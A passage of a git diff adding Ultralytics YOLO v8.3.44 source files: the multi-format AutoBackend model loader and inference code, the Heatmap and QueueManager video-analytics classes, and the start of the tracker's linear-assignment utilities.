cuda = False + + # Download if not local + if not (pt or triton or nn_module): + w = attempt_download_asset(w) + + # In-memory PyTorch model + if nn_module: + model = weights.to(device) + if fuse: + model = model.fuse(verbose=verbose) + if hasattr(model, "kpt_shape"): + kpt_shape = model.kpt_shape # pose-only + stride = max(int(model.stride.max()), 32) # model stride + names = model.module.names if hasattr(model, "module") else model.names # get class names + model.half() if fp16 else model.float() + self.model = model # explicitly assign for to(), cpu(), cuda(), half() + pt = True + + # PyTorch + elif pt: + from ultralytics.nn.tasks import attempt_load_weights + + model = attempt_load_weights( + weights if isinstance(weights, list) else w, device=device, inplace=True, fuse=fuse + ) + if hasattr(model, "kpt_shape"): + kpt_shape = model.kpt_shape # pose-only + stride = max(int(model.stride.max()), 32) # model stride + names = model.module.names if hasattr(model, "module") else model.names # get class names + model.half() if fp16 else model.float() + self.model = model # explicitly assign for to(), cpu(), cuda(), half() + + # TorchScript + elif jit: + LOGGER.info(f"Loading {w} for TorchScript inference...") + extra_files = {"config.txt": ""} # model metadata + model = torch.jit.load(w, _extra_files=extra_files, map_location=device) + model.half() if fp16 else model.float() + if extra_files["config.txt"]: # load metadata dict + metadata = json.loads(extra_files["config.txt"], object_hook=lambda x: dict(x.items())) + + # ONNX OpenCV DNN + elif dnn: + LOGGER.info(f"Loading {w} for ONNX OpenCV DNN inference...") + check_requirements("opencv-python>=4.5.4") + net = cv2.dnn.readNetFromONNX(w) + + # ONNX Runtime and IMX + elif onnx or imx: + LOGGER.info(f"Loading {w} for ONNX Runtime inference...") + check_requirements(("onnx", "onnxruntime-gpu" if cuda else "onnxruntime")) + if IS_RASPBERRYPI or IS_JETSON: + # Fix 'numpy.linalg._umath_linalg' has no attribute '_ilp64' for TF SavedModel on RPi and Jetson + check_requirements("numpy==1.23.5") + import onnxruntime + + providers = onnxruntime.get_available_providers() + if not cuda and "CUDAExecutionProvider" in providers: + providers.remove("CUDAExecutionProvider") + elif cuda and "CUDAExecutionProvider" not in providers: + LOGGER.warning("WARNING ⚠️ Failed to start ONNX Runtime session with CUDA. Falling back to CPU...") + device = torch.device("cpu") + cuda = False + LOGGER.info(f"Preferring ONNX Runtime {providers[0]}") + if onnx: + session = onnxruntime.InferenceSession(w, providers=providers) + else: + check_requirements( + ["model-compression-toolkit==2.1.1", "sony-custom-layers[torch]==0.2.0", "onnxruntime-extensions"] + ) + w = next(Path(w).glob("*.onnx")) + LOGGER.info(f"Loading {w} for ONNX IMX inference...") + import mct_quantizers as mctq + from sony_custom_layers.pytorch.object_detection import nms_ort # noqa + + session = onnxruntime.InferenceSession( + w, mctq.get_ort_session_options(), providers=["CPUExecutionProvider"] + ) + task = "detect" + + output_names = [x.name for x in session.get_outputs()] + metadata = session.get_modelmeta().custom_metadata_map + dynamic = isinstance(session.get_outputs()[0].shape[0], str) + if not dynamic: + io = session.io_binding() + bindings = [] + for output in session.get_outputs(): + y_tensor = torch.empty(output.shape, dtype=torch.float16 if fp16 else torch.float32).to(device) + io.bind_output( + name=output.name, + device_type=device.type, + device_id=device.index if cuda else 0, + element_type=np.float16 if fp16 else np.float32, + shape=tuple(y_tensor.shape), + buffer_ptr=y_tensor.data_ptr(), + ) + bindings.append(y_tensor) + + # OpenVINO + elif xml: + LOGGER.info(f"Loading {w} for OpenVINO inference...") + check_requirements("openvino>=2024.0.0") + import openvino as ov + + core = ov.Core() + w = Path(w) + if not w.is_file(): # if not *.xml + w = next(w.glob("*.xml")) # get *.xml file from *_openvino_model dir + ov_model = core.read_model(model=str(w), weights=w.with_suffix(".bin")) + if ov_model.get_parameters()[0].get_layout().empty: + ov_model.get_parameters()[0].set_layout(ov.Layout("NCHW")) + + # OpenVINO inference modes are 'LATENCY', 'THROUGHPUT' (not recommended), or 'CUMULATIVE_THROUGHPUT' + inference_mode = "CUMULATIVE_THROUGHPUT" if batch > 1 else "LATENCY" + LOGGER.info(f"Using OpenVINO {inference_mode} mode for batch={batch} inference...") + ov_compiled_model = core.compile_model( + ov_model, + device_name="AUTO", # AUTO selects best available device, do not modify + config={"PERFORMANCE_HINT": inference_mode}, + ) + input_name = ov_compiled_model.input().get_any_name() + metadata = w.parent / "metadata.yaml" + + # TensorRT + elif engine: + LOGGER.info(f"Loading {w} for TensorRT inference...") + try: + import tensorrt as trt # noqa https://developer.nvidia.com/nvidia-tensorrt-download + except ImportError: + if LINUX: + check_requirements("tensorrt>7.0.0,!=10.1.0") + import tensorrt as trt # noqa + check_version(trt.__version__, ">=7.0.0", hard=True) + check_version(trt.__version__, "!=10.1.0", msg="https://github.com/ultralytics/ultralytics/pull/14239") + if device.type == "cpu": + device = torch.device("cuda:0") + Binding = namedtuple("Binding", ("name", "dtype", "shape", "data", "ptr")) + logger = trt.Logger(trt.Logger.INFO) + # Read file + with open(w, "rb") as f, trt.Runtime(logger) as runtime: + try: + meta_len = int.from_bytes(f.read(4), byteorder="little") # read metadata length + metadata = json.loads(f.read(meta_len).decode("utf-8")) # read metadata + except UnicodeDecodeError: + f.seek(0) # engine file may lack embedded Ultralytics metadata + model = runtime.deserialize_cuda_engine(f.read()) # read engine + + # Model context + try: + context = model.create_execution_context() + except Exception as e: # model is None + LOGGER.error(f"ERROR: TensorRT model exported with a different version than {trt.__version__}\n") + raise e + + bindings = OrderedDict() + output_names = [] + fp16 = False # default updated below + dynamic = False + is_trt10 = not hasattr(model, "num_bindings") + num = range(model.num_io_tensors) if is_trt10 else range(model.num_bindings) + for i in num: + if is_trt10: + name = model.get_tensor_name(i) + dtype = trt.nptype(model.get_tensor_dtype(name)) + is_input = model.get_tensor_mode(name) == trt.TensorIOMode.INPUT + if is_input: + if -1 in tuple(model.get_tensor_shape(name)): + dynamic = True + context.set_input_shape(name, tuple(model.get_tensor_profile_shape(name, 0)[1])) + if dtype == np.float16: + fp16 = True + else: + output_names.append(name) + shape = tuple(context.get_tensor_shape(name)) + else: # TensorRT < 10.0 + name = model.get_binding_name(i) + dtype = trt.nptype(model.get_binding_dtype(i)) + is_input = model.binding_is_input(i) + if model.binding_is_input(i): + if -1 in tuple(model.get_binding_shape(i)): # dynamic + dynamic = True + context.set_binding_shape(i, tuple(model.get_profile_shape(0, i)[1])) + if dtype == np.float16: + fp16 = True + else: + output_names.append(name) + shape = tuple(context.get_binding_shape(i)) + im = torch.from_numpy(np.empty(shape, dtype=dtype)).to(device) + bindings[name] = Binding(name, dtype, shape, im, int(im.data_ptr())) + binding_addrs = OrderedDict((n, d.ptr) for n, d in bindings.items()) + batch_size = bindings["images"].shape[0] # if dynamic, this is instead max batch size + + # CoreML + elif coreml: + LOGGER.info(f"Loading {w} for CoreML inference...") + import coremltools as ct + + model = ct.models.MLModel(w) + metadata = dict(model.user_defined_metadata) + + # TF SavedModel + elif saved_model: + LOGGER.info(f"Loading {w} for TensorFlow SavedModel inference...") + import tensorflow as tf + + keras = False # assume TF1 saved_model + model = tf.keras.models.load_model(w) if keras else tf.saved_model.load(w) + metadata = Path(w) / "metadata.yaml" + + # TF GraphDef + elif pb: # https://www.tensorflow.org/guide/migrate#a_graphpb_or_graphpbtxt + LOGGER.info(f"Loading {w} for TensorFlow GraphDef inference...") + import tensorflow as tf + + from ultralytics.engine.exporter import gd_outputs + + def wrap_frozen_graph(gd, inputs, outputs): + """Wrap frozen graphs for deployment.""" + x = tf.compat.v1.wrap_function(lambda: tf.compat.v1.import_graph_def(gd, name=""), []) # wrapped + ge = x.graph.as_graph_element + return x.prune(tf.nest.map_structure(ge, inputs), tf.nest.map_structure(ge, outputs)) + + gd = tf.Graph().as_graph_def() # TF GraphDef + with open(w, "rb") as f: + gd.ParseFromString(f.read()) + frozen_func = wrap_frozen_graph(gd, inputs="x:0", outputs=gd_outputs(gd)) + try: # find metadata in SavedModel alongside GraphDef + metadata = next(Path(w).resolve().parent.rglob(f"{Path(w).stem}_saved_model*/metadata.yaml")) + except StopIteration: + pass + + # TFLite or TFLite Edge TPU + elif tflite or edgetpu: # https://www.tensorflow.org/lite/guide/python#install_tensorflow_lite_for_python + try: # https://coral.ai/docs/edgetpu/tflite-python/#update-existing-tf-lite-code-for-the-edge-tpu + from tflite_runtime.interpreter import Interpreter, load_delegate + except ImportError: + import tensorflow as tf + + Interpreter, load_delegate = tf.lite.Interpreter, tf.lite.experimental.load_delegate + if edgetpu: # TF Edge TPU https://coral.ai/software/#edgetpu-runtime + device = device[3:] if str(device).startswith("tpu") else ":0" + LOGGER.info(f"Loading {w} on device {device[1:]} for TensorFlow Lite Edge TPU inference...") + delegate = {"Linux": "libedgetpu.so.1", "Darwin": "libedgetpu.1.dylib", "Windows": "edgetpu.dll"}[ + platform.system() + ] + interpreter = Interpreter( + model_path=w, + experimental_delegates=[load_delegate(delegate, options={"device": device})], + ) + device = "cpu" # Required, otherwise PyTorch will try to use the wrong device + else: # TFLite + LOGGER.info(f"Loading {w} for TensorFlow Lite inference...") + interpreter = Interpreter(model_path=w) # load TFLite model + interpreter.allocate_tensors() # allocate + input_details = interpreter.get_input_details() # inputs + output_details = interpreter.get_output_details() # outputs + # Load metadata + try: + with zipfile.ZipFile(w, "r") as model: + meta_file = model.namelist()[0] + metadata = ast.literal_eval(model.read(meta_file).decode("utf-8")) + except zipfile.BadZipFile: + pass + + # TF.js + elif tfjs: + raise NotImplementedError("YOLOv8 TF.js inference is not currently supported.") + + # PaddlePaddle + elif paddle: + LOGGER.info(f"Loading {w} for PaddlePaddle inference...") + check_requirements("paddlepaddle-gpu" if cuda else "paddlepaddle") + import paddle.inference as pdi # noqa + + w = Path(w) + if not w.is_file(): # if not *.pdmodel + w = next(w.rglob("*.pdmodel")) # get *.pdmodel file from *_paddle_model dir + config = pdi.Config(str(w), str(w.with_suffix(".pdiparams"))) + if cuda: + config.enable_use_gpu(memory_pool_init_size_mb=2048, device_id=0) + predictor = pdi.create_predictor(config) + input_handle = predictor.get_input_handle(predictor.get_input_names()[0]) + output_names = predictor.get_output_names() + metadata = w.parents[1] / "metadata.yaml" + + # MNN + elif mnn: + LOGGER.info(f"Loading {w} for MNN inference...") + check_requirements("MNN") # requires MNN + import os + + import MNN + + config = {} + config["precision"] = "low" + config["backend"] = "CPU" + config["numThread"] = (os.cpu_count() + 1) // 2 + rt = MNN.nn.create_runtime_manager((config,)) + net = MNN.nn.load_module_from_file(w, [], [], runtime_manager=rt, rearrange=True) + + def torch_to_mnn(x): + return MNN.expr.const(x.data_ptr(), x.shape) + + metadata = json.loads(net.get_info()["bizCode"]) + + # NCNN + elif ncnn: + LOGGER.info(f"Loading {w} for NCNN inference...") + check_requirements("git+https://github.com/Tencent/ncnn.git" if ARM64 else "ncnn") # requires NCNN + import ncnn as pyncnn + + net = pyncnn.Net() + net.opt.use_vulkan_compute = cuda + w = Path(w) + if not w.is_file(): # if not *.param + w = next(w.glob("*.param")) # get *.param file from *_ncnn_model dir + net.load_param(str(w)) + net.load_model(str(w.with_suffix(".bin"))) + metadata = w.parent / "metadata.yaml" + + # NVIDIA Triton Inference Server + elif triton: + check_requirements("tritonclient[all]") + from ultralytics.utils.triton import TritonRemoteModel + + model = TritonRemoteModel(w) + metadata = model.metadata + + # Any other format (unsupported) + else: + from ultralytics.engine.exporter import export_formats + + raise TypeError( + f"model='{w}' is not a supported model format. Ultralytics supports: {export_formats()['Format']}\n" + f"See https://docs.ultralytics.com/modes/predict for help." + ) + + # Load external metadata YAML + if isinstance(metadata, (str, Path)) and Path(metadata).exists(): + metadata = yaml_load(metadata) + if metadata and isinstance(metadata, dict): + for k, v in metadata.items(): + if k in {"stride", "batch"}: + metadata[k] = int(v) + elif k in {"imgsz", "names", "kpt_shape"} and isinstance(v, str): + metadata[k] = eval(v) + stride = metadata["stride"] + task = metadata["task"] + batch = metadata["batch"] + imgsz = metadata["imgsz"] + names = metadata["names"] + kpt_shape = metadata.get("kpt_shape") + elif not (pt or triton or nn_module): + LOGGER.warning(f"WARNING ⚠️ Metadata not found for 'model={weights}'") + + # Check names + if "names" not in locals(): # names missing + names = default_class_names(data) + names = check_class_names(names) + + # Disable gradients + if pt: + for p in model.parameters(): + p.requires_grad = False + + self.__dict__.update(locals()) # assign all variables to self + + def forward(self, im, augment=False, visualize=False, embed=None): + """ + Runs inference on the YOLOv8 MultiBackend model. + + Args: + im (torch.Tensor): The image tensor to perform inference on. + augment (bool): whether to perform data augmentation during inference, defaults to False + visualize (bool): whether to visualize the output predictions, defaults to False + embed (list, optional): A list of feature vectors/embeddings to return. + + Returns: + (tuple): Tuple containing the raw output tensor, and processed output for visualization (if visualize=True) + """ + b, ch, h, w = im.shape # batch, channel, height, width + if self.fp16 and im.dtype != torch.float16: + im = im.half() # to FP16 + if self.nhwc: + im = im.permute(0, 2, 3, 1) # torch BCHW to numpy BHWC shape(1,320,192,3) + + # PyTorch + if self.pt or self.nn_module: + y = self.model(im, augment=augment, visualize=visualize, embed=embed) + + # TorchScript + elif self.jit: + y = self.model(im) + + # ONNX OpenCV DNN + elif self.dnn: + im = im.cpu().numpy() # torch to numpy + self.net.setInput(im) + y = self.net.forward() + + # ONNX Runtime + elif self.onnx or self.imx: + if self.dynamic: + im = im.cpu().numpy() # torch to numpy + y = self.session.run(self.output_names, {self.session.get_inputs()[0].name: im}) + else: + if not self.cuda: + im = im.cpu() + self.io.bind_input( + name="images", + device_type=im.device.type, + device_id=im.device.index if im.device.type == "cuda" else 0, + element_type=np.float16 if self.fp16 else np.float32, + shape=tuple(im.shape), + buffer_ptr=im.data_ptr(), + ) + self.session.run_with_iobinding(self.io) + y = self.bindings + if self.imx: + # boxes, conf, cls + y = np.concatenate([y[0], y[1][:, :, None], y[2][:, :, None]], axis=-1) + + # OpenVINO + elif self.xml: + im = im.cpu().numpy() # FP32 + + if self.inference_mode in {"THROUGHPUT", "CUMULATIVE_THROUGHPUT"}: # optimized for larger batch-sizes + n = im.shape[0] # number of images in batch + results = [None] * n # preallocate list with None to match the number of images + + def callback(request, userdata): + """Places result in preallocated list using userdata index.""" + results[userdata] = request.results + + # Create AsyncInferQueue, set the callback and start asynchronous inference for each input image + async_queue = self.ov.runtime.AsyncInferQueue(self.ov_compiled_model) + async_queue.set_callback(callback) + for i in range(n): + # Start async inference with userdata=i to specify the position in results list + async_queue.start_async(inputs={self.input_name: im[i : i + 1]}, userdata=i) # keep image as BCHW + async_queue.wait_all() # wait for all inference requests to complete + y = np.concatenate([list(r.values())[0] for r in results]) + + else: # inference_mode = "LATENCY", optimized for fastest first result at batch-size 1 + y = list(self.ov_compiled_model(im).values()) + + # TensorRT + elif self.engine: + if self.dynamic and im.shape != self.bindings["images"].shape: + if self.is_trt10: + self.context.set_input_shape("images", im.shape) + self.bindings["images"] = self.bindings["images"]._replace(shape=im.shape) + for name in self.output_names: + self.bindings[name].data.resize_(tuple(self.context.get_tensor_shape(name))) + else: + i = self.model.get_binding_index("images") + self.context.set_binding_shape(i, im.shape) + self.bindings["images"] = self.bindings["images"]._replace(shape=im.shape) + for name in self.output_names: + i = self.model.get_binding_index(name) + self.bindings[name].data.resize_(tuple(self.context.get_binding_shape(i))) + + s = self.bindings["images"].shape + assert im.shape == s, f"input size {im.shape} {'>' if self.dynamic else 'not equal to'} max model size {s}" + self.binding_addrs["images"] = int(im.data_ptr()) + self.context.execute_v2(list(self.binding_addrs.values())) + y = [self.bindings[x].data for x in sorted(self.output_names)] + + # CoreML + elif self.coreml: + im = im[0].cpu().numpy() + im_pil = Image.fromarray((im * 255).astype("uint8")) + # im = im.resize((192, 320), Image.BILINEAR) + y = self.model.predict({"image": im_pil}) # coordinates are xywh normalized + if "confidence" in y: + raise TypeError( + "Ultralytics only supports inference of non-pipelined CoreML models exported with " + f"'nms=False', but 'model={w}' has an NMS pipeline created by an 'nms=True' export." + ) + # TODO: CoreML NMS inference handling + # from ultralytics.utils.ops import xywh2xyxy + # box = xywh2xyxy(y['coordinates'] * [[w, h, w, h]]) # xyxy pixels + # conf, cls = y['confidence'].max(1), y['confidence'].argmax(1).astype(np.float32) + # y = np.concatenate((box, conf.reshape(-1, 1), cls.reshape(-1, 1)), 1) + elif len(y) == 1: # classification model + y = list(y.values()) + elif len(y) == 2: # segmentation model + y = list(reversed(y.values())) # reversed for segmentation models (pred, proto) + + # PaddlePaddle + elif self.paddle: + im = im.cpu().numpy().astype(np.float32) + self.input_handle.copy_from_cpu(im) + self.predictor.run() + y = [self.predictor.get_output_handle(x).copy_to_cpu() for x in self.output_names] + + # MNN + elif self.mnn: + input_var = self.torch_to_mnn(im) + output_var = self.net.onForward([input_var]) + y = [x.read() for x in output_var] + + # NCNN + elif self.ncnn: + mat_in = self.pyncnn.Mat(im[0].cpu().numpy()) + with self.net.create_extractor() as ex: + ex.input(self.net.input_names()[0], mat_in) + # WARNING: 'output_names' sorted as a temporary fix for https://github.com/pnnx/pnnx/issues/130 + y = [np.array(ex.extract(x)[1])[None] for x in sorted(self.net.output_names())] + + # NVIDIA Triton Inference Server + elif self.triton: + im = im.cpu().numpy() # torch to numpy + y = self.model(im) + + # TensorFlow (SavedModel, GraphDef, Lite, Edge TPU) + else: + im = im.cpu().numpy() + if self.saved_model: # SavedModel + y = self.model(im, training=False) if self.keras else self.model(im) + if not isinstance(y, list): + y = [y] + elif self.pb: # GraphDef + y = self.frozen_func(x=self.tf.constant(im)) + else: # Lite or Edge TPU + details = self.input_details[0] + is_int = details["dtype"] in {np.int8, np.int16} # is TFLite quantized int8 or int16 model + if is_int: + scale, zero_point = details["quantization"] + im = (im / scale + zero_point).astype(details["dtype"]) # de-scale + self.interpreter.set_tensor(details["index"], im) + self.interpreter.invoke() + y = [] + for output in self.output_details: + x = self.interpreter.get_tensor(output["index"]) + if is_int: + scale, zero_point = output["quantization"] + x = (x.astype(np.float32) - zero_point) * scale # re-scale + if x.ndim == 3: # if task is not classification, excluding masks (ndim=4) as well + # Denormalize xywh by image size. See https://github.com/ultralytics/ultralytics/pull/1695 + # xywh are normalized in TFLite/EdgeTPU to mitigate quantization error of integer models + if x.shape[-1] == 6: # end-to-end model + x[:, :, [0, 2]] *= w + x[:, :, [1, 3]] *= h + else: + x[:, [0, 2]] *= w + x[:, [1, 3]] *= h + if self.task == "pose": + x[:, 5::3] *= w + x[:, 6::3] *= h + y.append(x) + # TF segment fixes: export is reversed vs ONNX export and protos are transposed + if len(y) == 2: # segment with (det, proto) output order reversed + if len(y[1].shape) != 4: + y = list(reversed(y)) # should be y = (1, 116, 8400), (1, 160, 160, 32) + if y[1].shape[-1] == 6: # end-to-end model + y = [y[1]] + else: + y[1] = np.transpose(y[1], (0, 3, 1, 2)) # should be y = (1, 116, 8400), (1, 32, 160, 160) + y = [x if isinstance(x, np.ndarray) else x.numpy() for x in y] + + # for x in y: + # print(type(x), len(x)) if isinstance(x, (list, tuple)) else print(type(x), x.shape) # debug shapes + if isinstance(y, (list, tuple)): + if len(self.names) == 999 and (self.task == "segment" or len(y) == 2): # segments and names not defined + nc = y[0].shape[1] - y[1].shape[1] - 4 # y = (1, 32, 160, 160), (1, 116, 8400) + self.names = {i: f"class{i}" for i in range(nc)} + return self.from_numpy(y[0]) if len(y) == 1 else [self.from_numpy(x) for x in y] + else: + return self.from_numpy(y) + + def from_numpy(self, x): + """ + Convert a numpy array to a tensor. + + Args: + x (np.ndarray): The array to be converted. + + Returns: + (torch.Tensor): The converted tensor + """ + return torch.tensor(x).to(self.device) if isinstance(x, np.ndarray) else x + + def warmup(self, imgsz=(1, 3, 640, 640)): + """ + Warm up the model by running one forward pass with a dummy input. + + Args: + imgsz (tuple): The shape of the dummy input tensor in the format (batch_size, channels, height, width) + """ + import torchvision # noqa (import here so torchvision import time not recorded in postprocess time) + + warmup_types = self.pt, self.jit, self.onnx, self.engine, self.saved_model, self.pb, self.triton, self.nn_module + if any(warmup_types) and (self.device.type != "cpu" or self.triton): + im = torch.empty(*imgsz, dtype=torch.half if self.fp16 else torch.float, device=self.device) # input + for _ in range(2 if self.jit else 1): + self.forward(im) # warmup + + @staticmethod + def _model_type(p="path/to/model.pt"): + """ + Takes a path to a model file and returns the model type. Possibles types are pt, jit, onnx, xml, engine, coreml, + saved_model, pb, tflite, edgetpu, tfjs, ncnn or paddle. + + Args: + p: path to the model file. Defaults to path/to/model.pt + + Examples: + >>> model = AutoBackend(weights="path/to/model.onnx") + >>> model_type = model._model_type() # returns "onnx" + """ + from ultralytics.engine.exporter import export_formats + + sf = export_formats()["Suffix"] # export suffixes + if not is_url(p) and not isinstance(p, str): + check_suffix(p, sf) # checks + name = Path(p).name + types = [s in name for s in sf] + types[5] |= name.endswith(".mlmodel") # retain support for older Apple CoreML *.mlmodel formats + types[8] &= not types[9] # tflite &= not edgetpu + if any(types): + triton = False + else: + from urllib.parse import urlsplit + + url = urlsplit(p) + triton = bool(url.netloc) and bool(url.path) and url.scheme in {"http", "grpc"} + + return types + [triton] diff --git a/2024.ultralytics/v8.3.44/solutions/heatmap.py b/2024.ultralytics/v8.3.44/solutions/heatmap.py new file mode 100644 index 0000000..bf2903b --- /dev/null +++ b/2024.ultralytics/v8.3.44/solutions/heatmap.py @@ -0,0 +1,126 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import cv2 +import numpy as np + +from ultralytics.solutions.object_counter import ObjectCounter +from ultralytics.utils.plotting import Annotator + + +class Heatmap(ObjectCounter): + """ + A class to draw heatmaps in real-time video streams based on object tracks. + + This class extends the ObjectCounter class to generate and visualize heatmaps of object movements in video + streams. It uses tracked object positions to create a cumulative heatmap effect over time. + + Attributes: + initialized (bool): Flag indicating whether the heatmap has been initialized. + colormap (int): OpenCV colormap used for heatmap visualization. + heatmap (np.ndarray): Array storing the cumulative heatmap data. + annotator (Annotator): Object for drawing annotations on the image. + + Methods: + heatmap_effect: Calculates and updates the heatmap effect for a given bounding box. + generate_heatmap: Generates and applies the heatmap effect to each frame. + + Examples: + >>> from ultralytics.solutions import Heatmap + >>> heatmap = Heatmap(model="yolov8n.pt", colormap=cv2.COLORMAP_JET) + >>> frame = cv2.imread("frame.jpg") + >>> processed_frame = heatmap.generate_heatmap(frame) + """ + + def __init__(self, **kwargs): + """Initializes the Heatmap class for real-time video stream heatmap generation based on object tracks.""" + super().__init__(**kwargs) + + self.initialized = False # bool variable for heatmap initialization + if self.region is not None: # check if user provided the region coordinates + self.initialize_region() + + # store colormap + self.colormap = cv2.COLORMAP_PARULA if self.CFG["colormap"] is None else self.CFG["colormap"] + + def heatmap_effect(self, box): + """ + Efficiently calculates heatmap area and effect location for applying colormap. + + Args: + box (List[float]): Bounding box coordinates [x0, y0, x1, y1]. + + Examples: + >>> heatmap = Heatmap() + >>> box = [100, 100, 200, 200] + >>> heatmap.heatmap_effect(box) + """ + x0, y0, x1, y1 = map(int, box) + radius_squared = (min(x1 - x0, y1 - y0) // 2) ** 2 + + # Create a meshgrid with region of interest (ROI) for vectorized distance calculations + xv, yv = np.meshgrid(np.arange(x0, x1), np.arange(y0, y1)) + + # Calculate squared distances from the center + dist_squared = (xv - ((x0 + x1) // 2)) ** 2 + (yv - ((y0 + y1) // 2)) ** 2 + + # Create a mask of points within the radius + within_radius = dist_squared <= radius_squared + + # Update only the values within the bounding box in a single vectorized operation + self.heatmap[y0:y1, x0:x1][within_radius] += 2 + + def generate_heatmap(self, im0): + """ + Generate heatmap for each frame using Ultralytics. + + Args: + im0 (np.ndarray): Input image array for processing. + + Returns: + (np.ndarray): Processed image with heatmap overlay and object counts (if region is specified). + + Examples: + >>> heatmap = Heatmap() + >>> im0 = cv2.imread("image.jpg") + >>> result = heatmap.generate_heatmap(im0) + """ + if not self.initialized: + self.heatmap = np.zeros_like(im0, dtype=np.float32) * 0.99 + self.initialized = True # Initialize heatmap only once + + self.annotator = Annotator(im0, line_width=self.line_width) # Initialize annotator + self.extract_tracks(im0) # Extract tracks + + # Iterate over bounding boxes, track ids and classes index + for box, track_id, cls in zip(self.boxes, self.track_ids, self.clss): + # Draw bounding box and counting region + self.heatmap_effect(box) + + if self.region is not None: + self.annotator.draw_region(reg_pts=self.region, color=(104, 0, 123), thickness=self.line_width * 2) + self.store_tracking_history(track_id, box) # Store track history + self.store_classwise_counts(cls) # store classwise counts in dict + current_centroid = ((box[0] + box[2]) / 2, (box[1] + box[3]) / 2) + # Store tracking previous position and perform object counting + prev_position = None + if len(self.track_history[track_id]) > 1: + prev_position = self.track_history[track_id][-2] + self.count_objects(current_centroid, track_id, prev_position, cls) # Perform object counting + + if self.region is not None: + self.display_counts(im0) # Display the counts on the frame + + # Normalize, apply colormap to heatmap and combine with original image + if self.track_data.id is not None: + im0 = cv2.addWeighted( + im0, + 0.5, + cv2.applyColorMap( + cv2.normalize(self.heatmap, None, 0, 255, cv2.NORM_MINMAX).astype(np.uint8), self.colormap + ), + 0.5, + 0, + ) + + self.display_output(im0) # display output with base class function + return im0 # return output image for more usage diff --git a/2024.ultralytics/v8.3.44/solutions/queue_management.py b/2024.ultralytics/v8.3.44/solutions/queue_management.py new file mode 100644 index 0000000..043bd37 --- /dev/null +++ b/2024.ultralytics/v8.3.44/solutions/queue_management.py @@ -0,0 +1,112 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +from ultralytics.solutions.solutions import BaseSolution +from ultralytics.utils.plotting import Annotator, colors + + +class QueueManager(BaseSolution): + """ + Manages queue counting in real-time video streams based on object tracks. + + This class extends BaseSolution to provide functionality for tracking and counting objects within a specified + region in video frames. + + Attributes: + counts (int): The current count of objects in the queue. + rect_color (Tuple[int, int, int]): RGB color tuple for drawing the queue region rectangle. + region_length (int): The number of points defining the queue region. + annotator (Annotator): An instance of the Annotator class for drawing on frames. + track_line (List[Tuple[int, int]]): List of track line coordinates. + track_history (Dict[int, List[Tuple[int, int]]]): Dictionary storing tracking history for each object. + + Methods: + initialize_region: Initializes the queue region. + process_queue: Processes a single frame for queue management. + extract_tracks: Extracts object tracks from the current frame. + store_tracking_history: Stores the tracking history for an object. + display_output: Displays the processed output. + + Examples: + >>> cap = cv2.VideoCapture("Path/to/video/file.mp4") + >>> queue_manager = QueueManager(region=[100, 100, 200, 200, 300, 300]) + >>> while cap.isOpened(): + >>> success, im0 = cap.read() + >>> if not success: + >>> break + >>> out = queue.process_queue(im0) + """ + + def __init__(self, **kwargs): + """Initializes the QueueManager with parameters for tracking and counting objects in a video stream.""" + super().__init__(**kwargs) + self.initialize_region() + self.counts = 0 # Queue counts Information + self.rect_color = (255, 255, 255) # Rectangle color + self.region_length = len(self.region) # Store region length for further usage + + def process_queue(self, im0): + """ + Processes the queue management for a single frame of video. + + Args: + im0 (numpy.ndarray): Input image for processing, typically a frame from a video stream. + + Returns: + (numpy.ndarray): Processed image with annotations, bounding boxes, and queue counts. + + This method performs the following steps: + 1. Resets the queue count for the current frame. + 2. Initializes an Annotator object for drawing on the image. + 3. Extracts tracks from the image. + 4. Draws the counting region on the image. + 5. For each detected object: + - Draws bounding boxes and labels. + - Stores tracking history. + - Draws centroids and tracks. + - Checks if the object is inside the counting region and updates the count. + 6. Displays the queue count on the image. + 7. Displays the processed output. + + Examples: + >>> queue_manager = QueueManager() + >>> frame = cv2.imread("frame.jpg") + >>> processed_frame = queue_manager.process_queue(frame) + """ + self.counts = 0 # Reset counts every frame + self.annotator = Annotator(im0, line_width=self.line_width) # Initialize annotator + self.extract_tracks(im0) # Extract tracks + + self.annotator.draw_region( + reg_pts=self.region, color=self.rect_color, thickness=self.line_width * 2 + ) # Draw region + + for box, track_id, cls in zip(self.boxes, self.track_ids, self.clss): + # Draw bounding box and counting region + self.annotator.box_label(box, label=self.names[cls], color=colors(track_id, True)) + self.store_tracking_history(track_id, box) # Store track history + + # Draw tracks of objects + self.annotator.draw_centroid_and_tracks( + self.track_line, color=colors(int(track_id), True), track_thickness=self.line_width + ) + + # Cache frequently accessed attributes + track_history = self.track_history.get(track_id, []) + + # store previous position of track and check if the object is inside the counting region + prev_position = None + if len(track_history) > 1: + prev_position = track_history[-2] + if self.region_length >= 3 and prev_position and self.r_s.contains(self.Point(self.track_line[-1])): + self.counts += 1 + + # Display queue counts + self.annotator.queue_counts_display( + f"Queue Counts : {str(self.counts)}", + points=self.region, + region_color=self.rect_color, + txt_color=(104, 31, 17), + ) + self.display_output(im0) # display output with base class function + + return im0 # return output image for more usage diff --git a/2024.ultralytics/v8.3.44/trackers/utils/matching.py b/2024.ultralytics/v8.3.44/trackers/utils/matching.py new file mode 100644 index 0000000..4a3a420 --- /dev/null +++ b/2024.ultralytics/v8.3.44/trackers/utils/matching.py @@ -0,0 +1,157 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import numpy as np +import scipy +from scipy.spatial.distance import cdist + +from ultralytics.utils.metrics import batch_probiou, bbox_ioa + +try: + import lap # for linear_assignment + + assert lap.__version__ # verify package is not directory +except (ImportError, AssertionError, AttributeError): + from ultralytics.utils.checks import check_requirements + + check_requirements("lap>=0.5.12") # https://github.com/gatagat/lap + import lap + + +def linear_assignment(cost_matrix: np.ndarray, thresh: float, use_lap: bool = True) -> tuple: + """ + Perform linear assignment using either the scipy or lap.lapjv method. + + Args: + cost_matrix (np.ndarray): The matrix containing cost values for assignments, with shape (N, M). + thresh (float): Threshold for considering an assignment valid. + use_lap (bool): Use lap.lapjv for the assignment. If False, scipy.optimize.linear_sum_assignment is used. + + Returns: + matched_indices (np.ndarray): Array of matched indices of shape (K, 2), where K is the number of matches. + unmatched_a (np.ndarray): Array of unmatched indices from the first set, with shape (L,). + unmatched_b (np.ndarray): Array of unmatched indices from the second set, with shape (M,). + + Examples: + >>> cost_matrix = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]]) + >>> thresh = 5.0 + >>> matched_indices, unmatched_a, unmatched_b = linear_assignment(cost_matrix, thresh, use_lap=True) + """ + if cost_matrix.size == 0: + return np.empty((0, 2), dtype=int), 